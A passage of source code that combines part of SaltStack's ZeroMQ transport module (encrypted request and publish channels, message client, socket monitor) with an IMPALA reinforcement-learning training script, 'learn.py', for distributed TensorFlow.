opts['id'], # minion ID
kwargs.get('master_uri', opts.get('master_uri')), # master ID
kwargs.get('crypt', 'aes'), # TODO: use the same channel for crypt
)
# has to remain empty for singletons, since __init__ will *always* be called
def __init__(self, opts, **kwargs):
pass
# an init for the singleton instance to call
def __singleton_init__(self, opts, **kwargs):
self.opts = dict(opts)
self.ttype = 'zeromq'
# crypt defaults to 'aes'
self.crypt = kwargs.get('crypt', 'aes')
if 'master_uri' in kwargs:
self.opts['master_uri'] = kwargs['master_uri']
self._io_loop = kwargs.get('io_loop') or tornado.ioloop.IOLoop.current()
if self.crypt != 'clear':
            # we don't need to worry about auth as a kwarg, since it's a singleton
self.auth = salt.crypt.AsyncAuth(self.opts, io_loop=self._io_loop)
self.message_client = AsyncReqMessageClient(self.opts,
self.master_uri,
io_loop=self._io_loop,
)
def __del__(self):
'''
Since the message_client creates sockets and assigns them to the IOLoop we have to
specifically destroy them, since we aren't the only ones with references to the FDs
'''
if hasattr(self, 'message_client'):
self.message_client.destroy()
else:
log.debug('No message_client attr for AsyncZeroMQReqChannel found. Not destroying sockets.')
@property
def master_uri(self):
return self.opts['master_uri']
def _package_load(self, load):
return {
'enc': self.crypt,
'load': load,
}
@tornado.gen.coroutine
def crypted_transfer_decode_dictentry(self, load, dictkey=None, tries=3, timeout=60):
if not self.auth.authenticated:
            # Return control back to the caller; resume when authentication succeeds
yield self.auth.authenticate()
# Return control to the caller. When send() completes, resume by populating ret with the Future.result
ret = yield self.message_client.send(self._package_load(self.auth.crypticle.dumps(load)), timeout=timeout)
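        # The reply carries an RSA-encrypted AES session key: decrypt it with this minion's
        # private key (PKCS1-OAEP), then use it to decode the requested dictionary entry
        # from the payload.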
key = self.auth.get_keys()
cipher = PKCS1_OAEP.new(key)
aes = cipher.decrypt(ret['key'])
pcrypt = salt.crypt.Crypticle(self.opts, aes)
raise tornado.gen.Return(pcrypt.loads(ret[dictkey]))
@tornado.gen.coroutine
def _crypted_transfer(self, load, tries=3, timeout=60):
'''
Send a load across the wire, with encryption
In case of authentication errors, try to renegotiate authentication
and retry the method.
        This protects against failing too early when, for example, the master
        restarts during a minion state execution call.
        :param dict load: A load to send across the wire
        :param int tries: The number of attempts to make before failing
        :param int timeout: The number of seconds to wait for a response before failing
'''
@tornado.gen.coroutine
def _do_transfer():
# Yield control to the caller. When send() completes, resume by populating data with the Future.result
data = yield self.message_client.send(self._package_load(self.auth.crypticle.dumps(load)),
timeout=timeout,
)
            # We may not always get data back; a salt-call return submission, for example,
            # is a blind communication: we do not subscribe to return events, we just
            # upload the results to the master.
if data:
data = self.auth.crypticle.loads(data)
raise tornado.gen.Return(data)
if not self.auth.authenticated:
# Return control back to the caller, resume when authentication succeeds
yield self.auth.authenticate()
try:
            # Attempt the transfer; on an authentication error we re-authenticate below and retry.
ret = yield _do_transfer()
except salt.crypt.AuthenticationError:
# If auth error, return control back to the caller, continue when authentication succeeds
yield self.auth.authenticate()
ret = yield _do_transfer()
raise tornado.gen.Return(ret)
@tornado.gen.coroutine
def _uncrypted_transfer(self, load, tries=3, timeout=60):
'''
Send a load across the wire in cleartext
:param dict load: A load to send across the wire
:param int tries: The number of times to make before failure
:param int timeout: The number of seconds on a response before failing
'''
ret = yield self.message_client.send(self._package_load(load), timeout=timeout)
raise tornado.gen.Return(ret)
@tornado.gen.coroutine
def send(self, load, tries=3, timeout=60):
'''
Send a request, return a future which will complete when we send the message
'''
if self.crypt == 'clear':
ret = yield self._uncrypted_transfer(load, tries=tries, timeout=timeout)
else:
ret = yield self._crypted_transfer(load, tries=tries, timeout=timeout)
raise tornado.gen.Return(ret)
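# Illustrative sketch (not part of the original Salt source): how a caller might drive
# the request channel defined above from a coroutine. The opts dict contents and the
# direct constructor call are assumptions made only for illustration; real callers go
# through Salt's channel factory.
@tornado.gen.coroutine
def _example_req_channel_usage(opts):
    channel = AsyncZeroMQReqChannel(opts, crypt='aes')
    # send() resolves to the (decrypted) reply from the master once it arrives
    reply = yield channel.send({'cmd': '_pillar', 'id': opts['id']}, timeout=30)
    raise tornado.gen.Return(reply)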
class AsyncZeroMQPubChannel(salt.transport.mixins.auth.AESPubClientMixin, salt.transport.client.AsyncPubChannel):
'''
A transport channel backed by ZeroMQ for a Salt Publisher to use to
publish commands to connected minions
'''
def __init__(self,
opts,
**kwargs):
self.opts = opts
self.ttype = 'zeromq'
if 'io_loop' in kwargs:
self.io_loop = kwargs['io_loop']
else:
self.io_loop = tornado.ioloop.IOLoop()
self.hexid = hashlib.sha1(self.opts['id']).hexdigest()
self.auth = salt.crypt.AsyncAuth(self.opts, io_loop=self.io_loop)
self.serial = salt.payload.Serial(self.opts)
self.context = zmq.Context()
self._socket = self.context.socket(zmq.SUB)
if self.opts['zmq_filtering']:
# TODO: constants file for "broadcast"
self._socket.setsockopt(zmq.SUBSCRIBE, 'broadcast')
self._socket.setsockopt(zmq.SUBSCRIBE, self.hexid)
else:
self._socket.setsockopt(zmq.SUBSCRIBE, '')
self._socket.setsockopt(zmq.IDENTITY, self.opts['id'])
# TODO: cleanup all the socket opts stuff
if hasattr(zmq, 'TCP_KEEPALIVE'):
self._socket.setsockopt(
zmq.TCP_KEEPALIVE, self.opts['tcp_keepalive']
)
self._socket.setsockopt(
zmq.TCP_KEEPALIVE_IDLE, self.opts['tcp_keepalive_idle']
)
self._socket.setsockopt(
zmq.TCP_KEEPALIVE_CNT, self.opts['tcp_keepalive_cnt']
)
self._socket.setsockopt(
zmq.TCP_KEEPALIVE_INTVL, self.opts['tcp_keepalive_intvl']
)
recon_delay = self.opts['recon_default']
if self.opts['recon_randomize']:
recon_delay = randint(self.opts['recon_default'],
self.opts['recon_default'] + self.opts['recon_max']
)
log.debug("Generated random reconnect delay between '{0}ms' and '{1}ms' ({2})".format(
self.opts['recon_default'],
self.opts['recon_default'] + self.opts['recon_max'],
recon_delay)
)
log.debug("Setting zmq_reconnect_ivl to '{0}ms'".format(recon_delay))
self._socket.setsockopt(zmq.RECONNECT_IVL, recon_delay)
if hasattr(zmq, 'RECONNECT_IVL_MAX'):
log.debug("Setting zmq_reconnect_ivl_max to '{0}ms'".format(
self.opts['recon_default'] + self.opts['recon_max'])
)
self._socket.setsockopt(
zmq.RECONNECT_IVL_MAX, self.opts['recon_max']
)
if self.opts['ipv6'] is True and hasattr(zmq, 'IPV4ONLY'):
# IPv6 sockets work for both IPv6 and IPv4 addresses
self._socket.setsockopt(zmq.IPV4ONLY, 0)
if HAS_ZMQ_MONITOR and self.opts['zmq_monitor']:
self._monitor = ZeroMQSocketMonitor(self._socket)
self._monitor.start_io_loop(self.io_loop)
def destroy(self):
if hasattr(self, '_monitor') and self._monitor is not None:
self._monitor.stop()
self._monitor = None
if hasattr(self, '_stream'):
            # TODO: Optionally call stream.close() on newer pyzmq? It's broken on some
self._stream.io_loop.remove_handler(self._stream.socket)
self._stream.socket.close(0)
self.context.term()
def __del__(self):
self.destroy()
# TODO: this is the time to see if we are connected, maybe use the req channel to guess?
@tornado.gen.coroutine
def connect(self):
if not self.auth.authenticated:
yield self.auth.authenticate()
self.publish_port = self.auth.creds['publish_port']
self._socket.connect(self.master_pub)
@property
def master_pub(self):
'''
Return the master publish port
'''
return 'tcp://{ip}:{port}'.format(ip=self.opts['master_ip'],
port=self.publish_port)
@tornado.gen.coroutine
def _decode_messages(self, messages):
'''
Take the zmq messages, decrypt/decode them into a payload
:param list messages: A list of messages to be decoded
'''
messages_len = len(messages)
        # if it was one message, then it's old style
if messages_len == 1:
payload = self.serial.loads(messages[0])
# 2 includes a header which says who should do it
elif messages_len == 2:
payload = self.serial.loads(messages[1])
else:
            raise Exception(('Invalid number of messages ({0}) in zeromq pub '
                             'message from master').format(messages_len))
# Yield control back to the caller. When the payload has been decoded, assign
# the decoded payload to 'ret' and resume operation
ret = yield self._decode_payload(payload)
raise tornado.gen.Return(ret)
@property
def stream(self):
'''
Return the current zmqstream, creating one if necessary
'''
if not hasattr(self, '_stream'):
self._stream = zmq.eventloop.zmqstream.ZMQStream(self._socket, io_loop=self.io_loop)
return self._stream
def on_recv(self, callback):
'''
        Register a callback for received messages (that we didn't initiate)
:param func callback: A function which should be called when data is received
'''
if callback is None:
return self.stream.on_recv(None)
@tornado.gen.coroutine
def wrap_callback(messages):
payload = yield self._decode_messages(messages)
callback(payload)
return self.stream.on_recv(wrap_callback)
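# Illustrative sketch (not part of the original Salt source): typical minion-side use of
# the pub channel above. The callback is a hypothetical placeholder, shown only to make
# the connect()/on_recv() flow concrete.
@tornado.gen.coroutine
def _example_pub_channel_usage(opts):
    channel = AsyncZeroMQPubChannel(opts, io_loop=tornado.ioloop.IOLoop.current())
    # authenticate with the master and connect the SUB socket to its publish port
    yield channel.connect()
    # every decoded publish payload is handed to the registered callback
    channel.on_recv(lambda payload: log.debug('received publish payload: %s', payload))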
class ZeroMQReqServerChannel(salt.transport.mixins.auth.AESReqServerMixin, salt.transport.server.ReqServerChannel):
def zmq_device(self):
'''
Multiprocessing target for the zmq queue device
'''
salt.utils.appendproctitle('MWorkerQueue')
self.context = zmq.Context(self.opts['worker_threads'])
# Prepare the zeromq sockets
self.uri = 'tcp://{interface}:{ret_port}'.format(**self.opts)
self.clients = self.context.socket(zmq.ROUTER)
if self.opts['ipv6'] is True and hasattr(zmq, 'IPV4ONLY'):
# IPv6 sockets work for both IPv6 and IPv4 addresses
self.clients.setsockopt(zmq.IPV4ONLY, 0)
if HAS_ZMQ_MONITOR and self.opts['zmq_monitor']:
            # The socket monitor should only be used for debugging purposes, so using threading doesn't look too bad here
import threading
self._monitor = ZeroMQSocketMonitor(self.clients)
t = threading.Thread(target=self._monitor.start_poll)
t.start()
self.workers = self.context.socket(zmq.DEALER)
if self.opts.get('ipc_mode', '') == 'tcp':
self.w_uri = 'tcp://127.0.0.1:{0}'.format(
self.opts.get('tcp_master_workers', 4515)
)
else:
self.w_uri = 'ipc://{0}'.format(
os.path.join(self.opts['sock_dir'], 'workers.ipc')
)
log.info('Setting up the master communication server')
self.clients.bind(self.uri)
self.workers.bind(self.w_uri)
while True:
try:
zmq.device(zmq.QUEUE, self.clients, self.workers)
except zmq.ZMQError as exc:
if exc.errno == errno.EINTR:
continue
raise exc
def close(self):
'''
Cleanly shutdown the router socket
'''
if hasattr(self, '_monitor') and self._monitor is not None:
self._monitor.stop()
self._monitor = None
if hasattr(self, 'clients'):
self.clients.close()
self.stream.close()
def pre_fork(self, process_manager):
'''
Pre-fork we need to create the zmq router device
:param func process_manager: An instance of salt.utils.process.ProcessManager
'''
salt.transport.mixins.auth.AESReqServerMixin.pre_fork(self, process_manager)
process_manager.add_process(self.zmq_device)
def post_fork(self, payload_handler, io_loop):
'''
After forking we need to create all of the local sockets to listen to the
router
        :param func payload_handler: A function to be called to handle incoming payloads
                                     as they are picked up off the wire
:param IOLoop io_loop: An instance of a Tornado IOLoop, to handle event scheduling
'''
self.payload_handler = payload_handler
self.io_loop = io_loop
self.context = zmq.Context(1)
self._socket = self.context.socket(zmq.REP)
if self.opts.get('ipc_mode', '') == 'tcp':
self.w_uri = 'tcp://127.0.0.1:{0}'.format(
self.opts.get('tcp_master_workers', 4515)
)
else:
self.w_uri = 'ipc://{0}'.format(
os.path.join(self.opts['sock_dir'], 'workers.ipc')
)
log.info('Worker binding to socket {0}'.format(self.w_uri))
self._socket.connect(self.w_uri)
salt.transport.mixins.auth.AESReqServerMixin.post_fork(self, payload_handler, io_loop)
self.stream = zmq.eventloop.zmqstream.ZMQStream(self._socket, io_loop=self.io_loop)
self.stream.on_recv_stream(self.handle_message)
@tornado.gen.coroutine
def handle_message(self, stream, payload):
'''
        Handle incoming messages from the underlying streams
        :param ZMQStream stream: The ZeroMQ stream the payload arrived on.
            See http://zeromq.github.io/pyzmq/api/generated/zmq.eventloop.zmqstream.html
        :param dict payload: A payload to process
'''
try:
payload = self.serial.loads(payload[0])
payload = self._decode_payload(payload)
except Exception as e:
log.error('Bad load from minion')
stream.send(self.serial.dumps('bad load'))
raise tornado.gen.Return()
# TODO helper functions to normalize payload?
if not isinstance(payload, dict) or not isinstance(payload.get('load'), dict):
log.error('payload and load must be a dict. Payload was: {0} and load was {1}'.format(payload, payload.get('load')))
stream.send(self.serial.dumps('payload and load must be a dict'))
raise tornado.gen.Return()
# intercept the "_auth" commands, since the main daemon shouldn't know
# anything about our key auth
if payload['enc'] == 'clear' and payload.get('load', {}).get('cmd') == '_auth':
stream.send(self.serial.dumps(self._auth(payload['load'])))
raise tornado.gen.Return()
# TODO: test
try:
# Take the payload_handler function that was registered when we created the channel
# and call it, returning control to the caller until it completes
ret, req_opts = yield self.payload_handler(payload)
except Exception as e:
# always attempt to return an error to the minion
stream.send('Some exception handling minion payload')
log.error('Some exception handling a payload from minion', exc_info=True)
raise tornado.gen.Return()
req_fun = req_opts.get('fun', 'send')
if req_fun == 'send_clear':
stream.send(self.serial.dumps(ret))
elif req_fun == 'send':
stream.send(self.serial.dumps(self.crypticle.dumps(ret)))
elif req_fun == 'send_private':
stream.send(self.serial.dumps(self._encrypt_private(ret,
req_opts['key'],
req_opts['tgt'],
)))
else:
log.error('Unknown req_fun {0}'.format(req_fun))
# always attempt to return an error to the minion
stream.send('Server-side exception handling payload')
raise tornado.gen.Return()
class ZeroMQPubServerChannel(salt.transport.server.PubServerChannel):
'''
Encapsulate synchronous operations for a publisher channel
'''
def __init__(self, opts):
self.opts = opts
self.serial = salt.payload.Serial(self.opts) # TODO: in init?
def connect(self):
return tornado.gen.sleep(5)
def _publish_daemon(self):
'''
Bind to the interface specified in the configuration file
'''
salt.utils.appendproctitle(self.__class__.__name__)
# Set up the context
context = zmq.Context(1)
# Prepare minion publish socket
pub_sock = context.socket(zmq.PUB)
        # in 2.1 <= zmq < 3.0, there is only one HWM setting
try:
pub_sock.setsockopt(zmq.HWM, self.opts.get('pub_hwm', 1000))
# in zmq >= 3.0, there are separate send and receive HWM settings
except AttributeError:
# Set the High Water Marks. For more information on HWM, see:
# http://api.zeromq.org/4-1:zmq-setsockopt
pub_sock.setsockopt(zmq.SNDHWM, self.opts.get('pub_hwm', 1000))
pub_sock.setsockopt(zmq.RCVHWM, self.opts.get('pub_hwm', 1000))
if self.opts['ipv6'] is True and hasattr(zmq, 'IPV4ONLY'):
# IPv6 sockets work for both IPv6 and IPv4 addresses
pub_sock.setsockopt(zmq.IPV4ONLY, 0)
pub_uri = 'tcp://{interface}:{publish_port}'.format(**self.opts)
# Prepare minion pull socket
pull_sock = context.socket(zmq.PULL)
if self.opts.get('ipc_mode', '') == 'tcp':
pull_uri = 'tcp://127.0.0.1:{0}'.format(
self.opts.get('tcp_master_publish_pull', 4514)
)
else:
pull_uri = 'ipc://{0}'.format(
os.path.join(self.opts['sock_dir'], 'publish_pull.ipc')
)
salt.utils.zeromq.check_ipc_path_max_len(pull_uri)
# Start the minion command publisher
log.info('Starting the Salt Publisher on {0}'.format(pub_uri))
pub_sock.bind(pub_uri)
# Securely create socket
log.info('Starting the Salt Puller on {0}'.format(pull_uri))
old_umask = os.umask(0o177)
try:
pull_sock.bind(pull_uri)
finally:
os.umask(old_umask)
try:
while True:
# Catch and handle EINTR from when this process is sent
# SIGUSR1 gracefully so we don't choke and die horribly
try:
package = pull_sock.recv()
unpacked_package = salt.payload.unpackage(package)
payload = unpacked_package['payload']
if self.opts['zmq_filtering']:
# if you have a specific topic list, use that
if 'topic_lst' in unpacked_package:
for topic in unpacked_package['topic_lst']:
# zmq filters are substring match, hash the topic
# to avoid collisions
htopic = hashlib.sha1(topic).hexdigest()
pub_sock.send(htopic, flags=zmq.SNDMORE)
pub_sock.send(payload)
                        # otherwise it's a broadcast
else:
# TODO: constants file for "broadcast"
pub_sock.send('broadcast', flags=zmq.SNDMORE)
pub_sock.send(payload)
else:
pub_sock.send(payload)
except zmq.ZMQError as exc:
if exc.errno == errno.EINTR:
continue
raise exc
except KeyboardInterrupt:
# Cleanly close the sockets if we're shutting down
if pub_sock.closed is False:
pub_sock.setsockopt(zmq.LINGER, 1)
pub_sock.close()
if pull_sock.closed is False:
pull_sock.setsockopt(zmq.LINGER, 1)
pull_sock.close()
if context.closed is False:
context.term()
def pre_fork(self, process_manager):
'''
Do anything necessary pre-fork. Since this is on the master side this will
primarily be used to create IPC channels and create our daemon process to
do the actual publishing
:param func process_manager: A ProcessManager, from salt.utils.process.ProcessManager
'''
process_manager.add_process(self._publish_daemon)
def publish(self, load):
'''
Publish "load" to minions
:param dict load: A load to be sent across the wire to minions
'''
payload = {'enc': 'aes'}
crypticle = salt.crypt.Crypticle(self.opts, salt.master.SMaster.secrets['aes']['secret'].value)
payload['load'] = crypticle.dumps(load)
if self.opts['sign_pub_messages']:
master_pem_path = os.path.join(self.opts['pki_dir'], 'master.pem')
log.debug("Signing data packet")
payload['sig'] = salt.crypt.sign_message(master_pem_path, payload['load'])
# Send 0MQ to the publisher
context = zmq.Context(1)
pub_sock = context.socket(zmq.PUSH)
if self.opts.get('ipc_mode', '') == 'tcp':
pull_uri = 'tcp://127.0.0.1:{0}'.format(
self.opts.get('tcp_master_publish_pull', 4514)
)
else:
pull_uri = 'ipc://{0}'.format(
os.path.join(self.opts['sock_dir'], 'publish_pull.ipc')
)
pub_sock.connect(pull_uri)
int_payload = {'payload': self.serial.dumps(payload)}
# add some targeting stuff for lists only (for now)
if load['tgt_type'] == 'list':
int_payload['topic_lst'] = load['tgt']
pub_sock.send(self.serial.dumps(int_payload))
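# Illustrative sketch (not part of the original Salt source): how the master side might
# hand a job to the publisher channel above. The load contents are hypothetical, and in a
# real master pre_fork() must already have started the publisher daemon.
def _example_pub_server_usage(opts):
    channel = ZeroMQPubServerChannel(opts)
    # the payload is pushed to the local publisher daemon, which fans it out to minions
    channel.publish({'tgt_type': 'glob', 'tgt': '*', 'fun': 'test.ping'})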
# TODO: unit tests!
class AsyncReqMessageClient(object):
'''
    This class wraps the underlying zeromq REQ socket and gives a future-based
    interface to sending and receiving messages. This works around the primary
limitation of serialized send/recv on the underlying socket by queueing the
message sends in this class. In the future if we decide to attempt to multiplex
we can manage a pool of REQ/REP sockets-- but for now we'll just do them in serial
'''
def __init__(self, opts, addr, linger=0, io_loop=None):
'''
Create an asynchronous message client
:param dict opts: The salt opts dictionary
        :param str addr: The address to connect the underlying REQ socket to
:param int linger: The number of seconds to linger on a ZMQ socket. See
http://api.zeromq.org/2-1:zmq-setsockopt [ZMQ_LINGER]
:param IOLoop io_loop: A Tornado IOLoop event scheduler [tornado.ioloop.IOLoop]
'''
self.opts = opts
self.addr = addr
self.linger = linger
self.io_loop = io_loop or zmq.eventloop.ioloop.ZMQIOLoop.current()
self.serial = salt.payload.Serial(self.opts)
self.context = zmq.Context()
# wire up sockets
self._init_socket()
self.send_queue = []
# mapping of message -> future
self.send_future_map = {}
self.send_timeout_map = {} # message -> timeout
# TODO: timeout all in-flight sessions, or error
def destroy(self):
if hasattr(self, 'stream') and self.stream is not None:
# TODO: Optionally call stream.close() on newer pyzmq? It is broken on some.
if self.stream.socket:
self.stream.socket.close()
self.stream.io_loop.remove_handler(self.stream.socket)
# set this to None, more hacks for messed up pyzmq
self.stream.socket = None
self.socket.close()
self.context.term()
def __del__(self):
self.destroy()
def _init_socket(self):
if hasattr(self, 'stream'):
self.stream.close() # pylint: disable=E0203
self.socket.close() # pylint: disable=E0203
del self.stream
del self.socket
self.socket = self.context.socket(zmq.REQ)
# socket options
if hasattr(zmq, 'RECONNECT_IVL_MAX'):
self.socket.setsockopt(
zmq.RECONNECT_IVL_MAX, 5000
)
self._set_tcp_keepalive()
if self.addr.startswith('tcp://['):
# Hint PF type if bracket enclosed IPv6 address
if hasattr(zmq, 'IPV6'):
self.socket.setsockopt(zmq.IPV6, 1)
elif hasattr(zmq, 'IPV4ONLY'):
self.socket.setsockopt(zmq.IPV4ONLY, 0)
self.socket.linger = self.linger
self.socket.connect(self.addr)
self.stream = zmq.eventloop.zmqstream.ZMQStream(self.socket, io_loop=self.io_loop)
def _set_tcp_keepalive(self):
'''
Ensure that TCP keepalives are set for the ReqServer.
Warning: Failure to set TCP keepalives can result in frequent or unexpected
disconnects!
'''
if hasattr(zmq, 'TCP_KEEPALIVE') and self.opts:
if 'tcp_keepalive' in self.opts:
self.socket.setsockopt(
zmq.TCP_KEEPALIVE, self.opts['tcp_keepalive']
)
if 'tcp_keepalive_idle' in self.opts:
self.socket.setsockopt(
zmq.TCP_KEEPALIVE_IDLE, self.opts['tcp_keepalive_idle']
)
if 'tcp_keepalive_cnt' in self.opts:
self.socket.setsockopt(
zmq.TCP_KEEPALIVE_CNT, self.opts['tcp_keepalive_cnt']
)
if 'tcp_keepalive_intvl' in self.opts:
self.socket.setsockopt(
zmq.TCP_KEEPALIVE_INTVL, self.opts['tcp_keepalive_intvl']
)
@tornado.gen.coroutine
def _internal_send_recv(self):
while len(self.send_queue) > 0:
message = self.send_queue.pop(0)
future = self.send_future_map[message]
# send
def mark_future(msg):
if not future.done():
future.set_result(self.serial.loads(msg[0]))
self.stream.on_recv(mark_future)
self.stream.send(message)
try:
ret = yield future
except: # pylint: disable=W0702
self._init_socket() # re-init the zmq socket (no other way in zmq)
continue
self.remove_message_timeout(message)
def remove_message_timeout(self, message):
if message not in self.send_timeout_map:
return
timeout = self.send_timeout_map.pop(message)
self.io_loop.remove_timeout(timeout)
def timeout_message(self, message):
'''
Handle a message timeout by removing it from the sending queue
and informing the caller
:raises: SaltReqTimeoutError
'''
del self.send_timeout_map[message]
self.send_future_map.pop(message).set_exception(SaltReqTimeoutError('Message timed out'))
def send(self, message, timeout=None, callback=None):
'''
Return a future which will be completed when the message has a response
'''
message = self.serial.dumps(message)
future = tornado.concurrent.Future()
if callback is not None:
def handle_future(future):
response = future.result()
self.io_loop.add_callback(callback, response)
future.add_done_callback(handle_future)
# Add this future to the mapping
self.send_future_map[message] = future
if timeout is not None:
send_timeout = self.io_loop.call_later(timeout, self.timeout_message, message)
self.send_timeout_map[message] = send_timeout
if len(self.send_queue) == 0:
self.io_loop.spawn_callback(self._internal_send_recv)
self.send_queue.append(message)
return future
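# Illustrative sketch (not part of the original Salt source): the future-based interface
# described in the class docstring above. The message contents are hypothetical.
def _example_message_client_usage(opts, master_uri, io_loop):
    client = AsyncReqMessageClient(opts, master_uri, io_loop=io_loop)
    future = client.send({'enc': 'clear', 'load': {'cmd': '_auth'}}, timeout=60)
    # the future resolves on the IOLoop with the deserialized reply
    future.add_done_callback(lambda f: log.debug('got reply: %s', f.result()))
    return future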
class ZeroMQSocketMonitor(object):
__EVENT_MAP = None
def __init__(self, socket):
'''
Create ZMQ monitor sockets
More information:
http://api.zeromq.org/4-0:zmq-socket-monitor
'''
self._socket = socket
self._monitor_socket = self._socket.get_monitor_socket()
self._monitor_stream = None
def start_io_loop(self, io_loop):
log.trace("Event monitor start!")
self._monitor_stream = zmq.eventloop.zmqstream.ZMQStream(self._monitor_socket, io_loop=io_loop)
self._monitor_stream.on_recv(self.monitor_callback)
def start_poll(self):
log.trace("Event monitor start!")
while self._monitor_socket is not None and self._monitor_socket.poll():
msg = self._monitor_socket.recv_multipart()
self.monitor_callback(msg)
@property
def event_map(self):
if ZeroMQSocketMonitor.__EVENT_MAP is None:
event_map = {}
for name in dir(zmq):
if name.startswith('EVENT_'):
value = getattr(zmq, name)
event_map[value] = name
ZeroMQSocketMonitor.__EVENT_MAP = event_map
return ZeroMQSocketMonitor.__EVENT_MAP
def monitor_callback(self, msg):
evt = zmq.utils.monitor.parse_monitor_message(msg)
evt['description'] = self.event_map[evt['event']]
log.debug("ZeroMQ event: {0}".format(evt))
if evt['event'] == zmq.EVENT_MONITOR_STOPPED:
self.stop()
def stop(self):
if self._socket is None:
return
self._socket.disable_monitor()
self._socket = None
self._monitor_socket = None
if self._monitor_stream is not None:
self._monitor_stream.close()
self._monitor_stream = None
log.trace("Event monitor done!")
|
learn.py
|
import tensorflow as tf
from multiprocessing import Process, Queue
import os
import datetime
import numpy as np
from impala.model import ImpalaModel, Learner, Actor
from impala.replay_buffer import UniformBuffer, PrioritizedBuffer
from common.logger import TensorBoardWriter, CSVWriter, CombinedWriter
import utils as U
from impala.py_process import PyProcessHook
def get_default_parameters():
return {
'batch_size': 2,
'entropy_scale': 0.1,
'horizon': 256,
'learning_rate': 2.0e-4,
'max_steps': 50000,
'rho_clip': 2.0,
'sequence_length': 128
}
def parameter_grid_search():
"""
    Generator function that yields sets of parameters.
    Usage:
        for param_kws in parameter_grid_search():
            print(param_kws)
    :return: yields a dict of parameter keyword arguments
"""
horizons = [256]
batch_sizes = [16]
sequence_lengths = [16]
learning_rates = [2.0e-4, 4.0e-4]
entropy_scales = [1e-1, 1e-2, 1e-3]
for bs in batch_sizes:
for hor in horizons:
for seq_len in sequence_lengths:
for es in entropy_scales:
for lr in learning_rates:
yield dict(batch_size=bs, entropy_scale=es, horizon=hor,
learning_rate=lr, sequence_length=seq_len)
class NormalizeObservationsRewards:
def __init__(self, observation_space, clip_value=10.0, epsilon=1e-8):
self.obs_shape = observation_space.shape
self.ob_rms = U.TfRunningMeanStd(shape=observation_space.shape, scope='RunningMeanStd/Obs')
self.ret_rms = U.TfRunningMeanStd(shape=(), scope='RunningMeanStd/Rew')
self.clip = clip_value
self.epsilon = epsilon
def normalize_and_update(self, obs, rewards):
""" normalize inputs and update internal running mean/std parameters """
return self._ob_filter(obs), self._reward_filter(rewards.flatten())
def normalize(self, obs, rewards, update_internal_with_session=None):
""" only normalize inputs and rewards """
if update_internal_with_session:
self.get_values_from_tf_graph(session=update_internal_with_session)
flatten_obs = obs.reshape((-1, *self.obs_shape))
ob = np.clip((flatten_obs - self.ob_rms.mean) / np.sqrt(self.ob_rms.var + self.epsilon), -self.clip, self.clip)
rew = np.clip((rewards.flatten() - self.ret_rms.mean) / np.sqrt(self.ret_rms.var + self.epsilon), -self.clip, self.clip)
return ob, rew
def normalize_observation(self, obs):
""" only normalize inputs"""
return np.clip((obs - self.ob_rms.mean) / np.sqrt(self.ob_rms.var + self.epsilon), -self.clip, self.clip)
def _ob_filter(self, obs):
# flatten observations for calculating mean and std along axis=0
flatten_obs = obs.reshape((-1, *self.obs_shape))
self.ob_rms.update(flatten_obs)
normed_flat_obs = np.clip((flatten_obs - self.ob_rms.mean) / np.sqrt(self.ob_rms.var + self.epsilon), -self.clip, self.clip)
return normed_flat_obs
def _reward_filter(self, rewards):
self.ret_rms.update(rewards)
rew = np.clip((rewards - self.ret_rms.mean) / np.sqrt(self.ret_rms.var + self.epsilon), -self.clip, self.clip)
return rew
def setup(self, session=None):
""" get_values_from_tf_graph and copy into classes"""
self.ob_rms.get_values_from_tf_graph(session)
self.ret_rms.get_values_from_tf_graph(session)
def get_values_from_tf_graph(self, session=None):
""" get_values_from_tf_graph and copy into classes"""
self.ob_rms.get_values_from_tf_graph(session)
self.ret_rms.get_values_from_tf_graph(session)
def update_ops(self, obs, rewards, session):
flatten_obs = obs.reshape((-1, *self.obs_shape))
if not session.should_stop():
self.ob_rms.update(flatten_obs, session=session)
self.ret_rms.update(rewards.flatten(), session=session)
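# Illustrative sketch (not part of the original module): the clipped standardization that
# NormalizeObservationsRewards applies, written with plain numpy so it can be inspected in
# isolation. The sample data is made up.
def _normalization_sketch(clip_value=10.0, epsilon=1e-8):
    obs = np.random.randn(32, 4) * 3.0 + 5.0        # fake batch of observations
    mean, var = obs.mean(axis=0), obs.var(axis=0)   # stand-in for the running statistics
    return np.clip((obs - mean) / np.sqrt(var + epsilon), -clip_value, clip_value)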
def training(cluster,
job_name,
task_index,
queue,
kwargs,
horizon,
sequence_length,
learning_rate,
entropy_scale,
max_steps,
batch_size):
"""
Trains the architecture
learner updates the parameters of the NN according to Actor-Critic
actors roll-out policy and put trajectories into queue
:param cluster:
:param job_name:
:param task_index:
:param queue:
:param kwargs:
:param horizon:
:param sequence_length:
:param learning_rate:
:param entropy_scale:
:param max_steps:
:param batch_size:
:return:
"""
print('==============================')
print('Parsed Parameters for Training')
print('============================== \n')
print('Learning Rate: {}'.format(learning_rate))
print('Horizon: {}'.format(horizon))
print('Sequence Length: {}'.format(sequence_length))
print('Entropy Scale: {}'.format(entropy_scale))
print('Maximum Steps: {}'.format(max_steps))
print('\n==============================')
print('Started server: job_name={}, task_index={}'.format(job_name, task_index))
date_string = datetime.datetime.now().strftime("%Y_%m_%d__%H_%M")
log_directory = os.path.join('/tmp/impala', date_string)
is_chief = (job_name == 'learner')
server = tf.train.Server(cluster, job_name=job_name, task_index=task_index)
device_name = '/job:{}/task:{}'.format(job_name, task_index)
print('Place on tf model on device:', device_name)
with tf.device(tf.train.replica_device_setter(worker_device=device_name, cluster=cluster)):
# create model ...
env = U.make_env(**kwargs) # share running mean ops across devices
normalizer = NormalizeObservationsRewards(observation_space=env.observation_space)
        if is_chief:  # only the learner needs to build the loss
with tf.device('/gpu'):
model = ImpalaModel(observation_shape=env.observation_space.shape,
n_actions=env.action_space.n,
learning_rate=learning_rate,
entropy_scale=entropy_scale)
model.build_loss()
model.build_trainer()
trajectory_buffer = PrioritizedBuffer(obs_shape=env.observation_space.shape,
batch_size=batch_size,
horizon=horizon,
sequence_length=sequence_length,
size=1000)
logs = CombinedWriter(dir=log_directory)
print('Logging to', log_directory)
U.dump_dict_as_json(kwargs, directory=log_directory, file_name='configuration')
worker = Learner(model=model, queue=queue, buffer=trajectory_buffer, logger=logs, norm=normalizer, **kwargs)
else:
with tf.device('/cpu'): # pin workers to CPU
model = ImpalaModel(observation_shape=env.observation_space.shape,
n_actions=env.action_space.n,
learning_rate=learning_rate,
entropy_scale=entropy_scale)
worker = Actor(model=model, env=env, queue=queue, normalizer=normalizer, **kwargs)
# The StopAtStepHook handles stopping after running given steps.
# max_steps = 10000
